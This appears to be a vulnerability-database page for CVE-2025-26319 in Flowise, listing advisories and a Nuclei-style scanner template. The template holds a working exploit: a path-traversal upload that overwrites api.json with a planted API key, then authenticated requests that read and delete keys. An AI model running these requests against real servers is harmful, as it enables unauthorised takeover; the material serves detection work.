| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| The vulnerability of the /api/v1/attachments component of the software platform for creating custom interfaces based on Language Models (LLMs) from Flowise allows a malicious actor to gain access to the ability to upload any files. | 27 Apr 202600:00 | – | bdu_fstec | |
| CVE-2025-26319 | 4 Mar 202521:35 | – | circl | |
| Flowise 代码问题漏洞 | 4 Mar 202500:00 | – | cnnvd | |
| CVE-2025-26319 | 4 Mar 202500:00 | – | cve | |
| CVE-2025-26319 | 4 Mar 202500:00 | – | cvelist | |
| FlowiseAI Flowise arbitrary file upload vulnerability | 5 Mar 202500:30 | – | github | |
| CVE-2025-26319 | 4 Mar 202522:15 | – | nvd | |
| CVE-2025-26319 | 4 Mar 202522:15 | – | osv | |
| GHSA-69JQ-QR7W-J7QH FlowiseAI Flowise arbitrary file upload vulnerability | 5 Mar 202500:30 | – | osv | |
| PT-2025-9712 | 4 Mar 202500:00 | – | ptsecurity |
id: CVE-2025-26319
info:
name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
impact: |
Unauthenticated attackers can exploit path traversal in file uploads to overwrite the api.json configuration file, potentially exposing API keys and achieving remote code execution.
remediation: |
Upgrade to FlowiseAI Flowise version 2.2.7 or later that properly validates file upload paths.
reference:
- https://github.com/advisories/GHSA-69jq-qr7w-j7qh
- https://github.com/FlowiseAI/Flowise
- https://nvd.nist.gov/vuln/detail/CVE-2025-26319
classification:
epss-score: 0.50789
epss-percentile: 0.98789
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2025-26319
cwe-id: CWE-434
metadata:
verified: true
max-request: 3
vendor: FlowiseAI
product: Flowise
shodan-query: title:"Flowise"
fofa-query: title="Flowise"
tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln,ai
flow: http(1) && http(2)
http:
- raw:
- |
POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w
------WebKitFormBoundarydTh0yj8zypRgPT1w
Content-Disposition: form-data; name="files";filename="api.json"
Content-type: text/plain
[{
"keyName":"=",
"apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
"apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
"createdAt":"111",
"id":"1111"
}]
------WebKitFormBoundarydTh0yj8zypRgPT1w--
matchers:
- type: word
part: body
words:
- 'name":'
- 'mimeType":"text/plain'
condition: and
internal: true
- raw:
- |
GET /api/v1/apikey HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ
- |
DELETE /api/v1/apikey/1111 HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'apiKey":"'
- 'apiSecret":'
- 'chatFlows'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022044be5a31f9b5273199f2d1e40378da803d05b25ba2a5b89ce9372ff43ee5b9d0022100fae58b1d0074efb996b51c48e5ff456d461a33cb0f80ab501018025be2e28c83:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation